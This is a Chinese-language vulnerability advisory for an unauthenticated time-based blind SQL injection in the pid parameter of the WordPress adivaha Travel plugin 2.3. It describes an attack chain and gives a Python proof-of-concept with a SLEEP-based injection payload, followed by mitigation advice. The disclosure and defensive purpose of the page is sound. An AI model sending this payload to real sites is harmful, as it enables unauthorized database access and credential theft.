CVE-2023-54359 CVSS 8.2 高危

CVE-2023-54359 WordPress adivaha Travel插件SQL注入漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2023-54359

漏洞类型

SQL注入

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress adivaha Travel Plugin

漏洞概述

WordPress adivaha Travel Plugin 2.3版本存在基于时间的盲注SQL注入漏洞。由于未对用户输入进行充分过滤，未经身份认证的攻击者可以通过向/mobile-app/v3/端点发送包含恶意SQL代码的pid参数请求，操纵数据库查询。成功利用该漏洞可导致敏感信息泄露或拒绝服务。

技术细节

该漏洞的根源在于WordPress adivaha Travel Plugin在处理/mobile-app/v3/接口请求时，未对GET参数pid进行严格的类型检查和SQL特殊字符过滤，导致参数直接拼接到数据库查询语句中。这是一个基于时间的盲注漏洞，攻击者无法直接获取查询结果，但可以通过构造包含特定逻辑判断（如IF语句）和延时函数（如SLEEP()）的恶意SQL语句，根据服务器响应时间的差异来推断数据库中的敏感信息。攻击者通常使用基于XOR编码的Payload来绕过Web应用防火墙（WAF）或简单的过滤机制。由于该漏洞无需身份认证即可利用，攻击者可远程发起攻击，遍历数据库结构，窃取管理员密码、用户信息等核心数据，甚至通过高负载的SQL查询导致数据库资源耗尽，引发拒绝服务。

攻击链分析

STEP 1

信息收集

攻击者识别目标站点运行了WordPress adivaha Travel Plugin，并确认版本为2.3或受影响版本。

STEP 2

漏洞探测

攻击者向/mobile-app/v3/端点发送包含恶意SQL注入代码的pid参数，测试是否存在基于时间的盲注漏洞。

STEP 3

数据提取

利用盲注技术，通过构造布尔逻辑和延时语句，逐位提取数据库结构、管理员哈希、用户信息等敏感数据。

STEP 4

达成目的

获取到敏感凭据后进一步控制站点，或通过高频查询耗尽数据库资源导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import time

def check_sqli(url):
    # Target endpoint
    target = f"{url}/mobile-app/v3/"
    
    # Payload to test time-based blind SQL injection
    # Uses XOR-like obfuscation concept (simplified here) and SLEEP()
    # If the database sleeps, the condition is likely true
    payload = {
        "pid": "1' OR IF(1=1,SLEEP(5),0)-- -"
    }

    try:
        start = time.time()
        r = requests.get(target, params=payload, timeout=10)
        end = time.time()
        
        duration = end - start
        if duration >= 5:
            return f"[+] Vulnerable! Response took {duration:.2f} seconds."
        else:
            return f"[-] Not vulnerable or patched. Response took {duration:.2f} seconds."
    except Exception as e:
        return f"[!] Error: {e}"

if __name__ == "__main__":
    target_host = "http://example.com"
    print(check_sqli(target_host))

影响范围

WordPress adivaha Travel Plugin 2.3

防御指南

临时缓解措施

如果无法立即升级，建议暂时禁用该插件或在服务器/WAF层面阻断对/mobile-app/v3/路径的外部访问请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表